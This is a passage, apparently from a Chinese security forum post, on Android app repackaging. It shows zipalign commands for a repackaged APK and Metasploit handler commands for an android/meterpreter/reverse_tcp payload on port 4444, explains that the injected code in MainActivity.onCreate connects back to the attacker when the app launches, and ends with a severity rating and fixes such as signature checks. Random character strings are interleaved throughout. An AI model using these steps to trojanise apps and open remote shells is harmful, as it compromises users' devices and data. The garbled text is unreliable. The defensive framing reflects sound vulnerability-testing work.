0 i1 E9 g/ H! ^* L! f2 s. d# j, q- V* O6 t6 p 对齐 ) K7 D* c+ }0 _: K9 X% s& A+ b2 L/ Q1 F$ ^" I; d0 y0 w

* u+ K3 D( v9 A* ` 9 Q- I# J5 ^5 u 字节对齐优化 ' ?8 G9 I0 d+ V2 Y2 S& c1 M s2 x2 M

3 D3 I" n3 ]3 O: R1 ]( m+ _% V0 K# M; f$ N2 ^ zipalign -v 4 repackaged.apk final.apk / L' Z0 \' v0 h5 U+ S# ~4 Q ' t# H) A- U/ _) w- L( ]8 o) p

4 |; ]; N( ^/ o' o( K# [ 0 u" I R% T$ n ]1 F 检查是否对齐 8 q2 t& Q$ p' V3 f/ a a+ H" M9 A3 ~6 P5 i1 ]$ V5 C) `7 N$ V

( Z2 G, G3 ?* d+ Y4 E! f, K " C/ q9 N8 d. u2 ?8 ?7 i zipalign -c -v 4 final.apk ' g8 w; K' d1 z0 `3 E , w" N- W3 V# s: N

6 q) R* r ~ `# c+ F 8 L3 z3 m- h- G9 ^+ Z& T 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 . V* j, z. Q; z- z2 `; A- y ' S! q1 q2 \7 R4 e# C- l

2 M: u" |; D- @# @6 H 0 N, T' N8 |& `% ]. ]1 P+ a' F 启动Metasploit控制台，配置参数等待上线 ' f. c: K* k/ c& @( G" O" y4 x- ~1 `) {

2 s+ {4 j& e8 |) q l0 Y- @7 Y. y* N- k3 I8 @ t0 B: R4 o `+ u 在终端依次输入如下命令 4 V2 h: H4 N- u4 o8 c 6 [1 u( A; {& m1 a( a

7 ~& @3 {: D+ R( U; X6 z1 Q % s4 U3 K% o* V# q6 g) o msfconsole + e$ `# Q" H' q/ S2 o4 r! _5 ]) J0 P6 c- S8 a: Q3 T

, b# o$ y* d* @0 G# H* Y" a0 X, L; n' A 9 g7 D5 V: d) H6 y' W/ a use exploit/multi/handler 1 R W' q, k( l) O) u) w! i7 B1 n2 `4 n

1 J# I2 X3 x3 j2 @8 v# s# o 8 U3 B2 h8 j8 L4 t) @9 p set PAYLOAD android/meterpreter/reverse_tcp - ]: L3 N' D6 H: U 1 r$ U: S2 @! U& |" L- c

5 c9 c& q- d( ~' L ! i/ C1 B8 C4 L; a* P( P* ] set LHOST 192.xxx.xx.xx 7 [( I6 s2 T: a1 A3 r7 X2 U$ Z; z4 E. o$ b# U: @3 }4 z4 n

1 T' K* @% C% P( V . Q- S8 e- a0 i+ B: v; e4 k set LPORT 4444 ( P' F7 [ N( y; x9 y + L; @( S' u$ s- k& w w; `

- O3 G V( S) p& j+ P' o3 H6 Q# v& o$ g6 [* o0 ^/ c) Q- A) y exploit ! a, m: U3 U7 ]' D+ \8 ^4 @1 e% I9 ]3 F- m* P& k( C" r" ~

9 M6 a$ I& t1 e6 @% u W# R9 N, f 9 _% Z' t7 |! r; w. C# M$ \ 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： % P- c# J# Q9 G; t 4 B( U3 x+ i. F. Z: [

) B c8 |* {2 D X7 A% @/ `3 D7 N ; @3 P* L- C5 _! J0 X6 w$ L 漏洞危害：中 5 y0 d+ { U5 x7 ~: \3 [, }" t 5 _1 e1 I! r+ L; H4 V; `% l' u

( \|7 M/ ]) [6 D 2 D; \|2 [% n4 N4 _8 v # R- q8 t+ e3 }2 F) @6 m* W+ G% G( D, b) d1 _6 H: Z6 ? 严重程度 1 ~% H0 H: @, D $ w4 U% b; L* Y m" K) h; n) W+ \( G2 \- e ' s0 t; ]' l/ l. \	3 C2 M% v% x. A: [, l- c6 V9 [, S+ V+ z, {2 X % z6 [; Z5 c3 b6 ^- O' d , `6 b# ^& W! }" E: Q 高 / T, u: I6 s1 \+ C; N 1 D; R( X( p% \|! d! ?0 J' K- q 0 X5 C; B& R# S. h# O 1 t5 g9 f; v- d) O( D( s	0 V6 \: m {# d* Q# P 6 J; f; d" j! Q ( x- D# z7 o9 ~! {# ~9 N, u . F8 N' y) W/ y! u1 X6 U7 j ■ & b5 z7 W% v8 E2 K7 e* v! v7 `& b9 I; b& e, S4 q z 3 q# q- q& Y" Y ?) u1 W' u9 a& B) W# r4 R9 ]2 w	I. d& o8 R& K: n- _9 L' M, T1 c : ?$ K2 d$ l& J, X: @ F % @9 W: U. @( K0 [( M ) D3 Q# f. }! p0 H% w# Q 中 1 B& L% J( j- s8 }# X! \, a* \|5 o: n/ e5 a; ] O, Y% P 3 {! @8 L1 n* L, j' A % c* R- Q/ t& ]. O! [	2 K7 B+ P# O0 A7 K' D7 N2 z( T " w" O5 ]$ o" e a+ i, D* v1 \|# B ( H/ R% D% e$ C" u/ x# T' r) b& A( \; i- ?( z+ ^ 7 f3 q% J3 J' g) A K : y. @% @4 W5 Z7 \| * ]# Z. o" i ?! Z7 Q8 a, Y; v Z+ ~5 W# N* S/ s 3 ]# ]$ I( F3 c2 ~4 Y : h) J M* C* `9 N	" c: b# h& T- j' s * u' m- o+ s7 @4 w- R) w. I% s" t 5 w! x; L. F% T$ H8 b! \|2 \ / w1 H. Q' u4 w, A 低 + d. c7 m- k, V- s/ T5 V% i" ?1 \|. j 9 T' [1 ]8 J8 O; O, N O $ [3 w4 j4 @$ t( E! c$ X 3 `' z6 x! P5 A: m0 a2 k/ U6 m	6 i; Y! L& h8 p* d7 r: J0 s( r1 z7 v. Y- @) L) k- r1 z 7 T7 P0 W; y: E9 S, V9 \6 Q: b ) q! z" L# @7 q2 c+ s4 T4 ]0 [$ m ) l5 z/ f6 k* {1 E! T% v" `. A% e' f1 h% D# ?! B 4 \|3 X& m4 a( v! Z T, L6 C; \+ h 4 c5 y0 z! T4 d, x X2 G 4 [. G& e9 K3 d4 ] , F/ c- ~1 A( T8 X& J/ u

8 C, U; N( E) b( @8 d. R& E7 g- q" k9 U( U U( t 0 ~. c6 l1 k. f; Z, a! H; G 4 C _) a6 T- m6 |2 J. S0 z7 j- G

- Q T7 v6 E7 {3 |9 d9 {5 u4 J1 u# I, G! ]( k# s 修复方法： ! Q, }( O" ]) m, ?1 V, ? # H! }( ^. p$ n+ _) w1 j& }- n

2 U9 K4 Y+ E$ i3 I- w4 @, h) r4 a$ m: t& N, W/ q4 f5 L) y* C. c 1.在 APP 启动时应做签名校验防止二次打包。
% q, ?+ o; G4 H 4 _( B& v! ^ [2 e0 `; T/ m. T. R+ k 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 . n, @& f2 N; ^" b& [( f- l7 m! f; s* a. J8 @& q7 @+ O

8 K# I3 k9 z/ z% b: @ 2 V# G& ~. m& t/ W' J; O8 [ , P/ ?: C' D8 L / N4 |* x% n: Z6 w, a

3 P2 D: _: a8 |1 k7 c' O - t% L* {" C% P/ u1 U0 g
* W3 f; f& V/ u6 a- K$ J, `& T + Q) a, X8 [9 C* f. m3 W' |

		自动登录	找回密码
密码			立即注册